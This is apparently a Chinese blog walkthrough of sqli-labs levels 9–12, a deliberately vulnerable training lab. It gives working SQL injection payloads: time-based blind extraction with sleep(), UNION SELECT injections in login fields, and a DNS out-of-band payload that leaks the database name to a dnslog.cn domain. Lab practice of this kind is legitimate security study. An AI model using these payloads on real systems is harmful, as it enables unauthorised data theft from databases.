less-9

经过尝试发现只有一种页面,可以使用时间盲注和外带注入
时间盲注

利用sleep()函数是否执行来判断构造
通过判断,确认为单引号字符串


?id=1'and if(length((select database()))>7,sleep(3),1)--+
同样利用函数来判断出数据库名长度为8位


判断出第一位ASCII值为115,对应s
?id=1'and if(ascii(substr((select database()),1,1))>114,sleep(3),1)--+
同理可以查询到其他的信息
外带注入
打开dnslog.cn,点击左面按钮获得一个域名

在指令中带上这个域名
?id=1' and (select load_file(concat('\\\\',(select hex(database())),'.域名\\aaa')))%23--+
访问后即可点击右面按钮查看(也可不用hex(),不过尽量使⽤ hex() 函数编码一下,不然可能无法请求)

十六进制数7365637572697479对应的英文是"security"
注:如果没有反应在phpstudy_pro\Extensions\MySQL5.7.26\my.ini 文件中添加
secure_file_priv = ''

外带注入更简单一点
less-10

经过尝试,发现没有变换,也没有报错信息,使用时间盲注

尝试后发现为双引号字符型


?id=1" and if(length(database())>8,sleep(3),3)--+
剩余操作同上
?id=1“”and if(ascii(substr((select database()),1,1))>114,sleep(3),1)--+
同样也可以外带注入
less-11
在输入框进行注入类型判断
在username 和passward分别输入'页面均有变化,可知都可能有回显点


输入'#页面无变化,说明是字符型
在框内输入指令
1' union select database(),version()#

即可查询到数据库信息
less-12
输入双引号,可能有回显点


闭合成功

和上一题一样的操作,输入
1") union select database(),version()#

得到信息
1246

被折叠的 条评论
为什么被折叠?



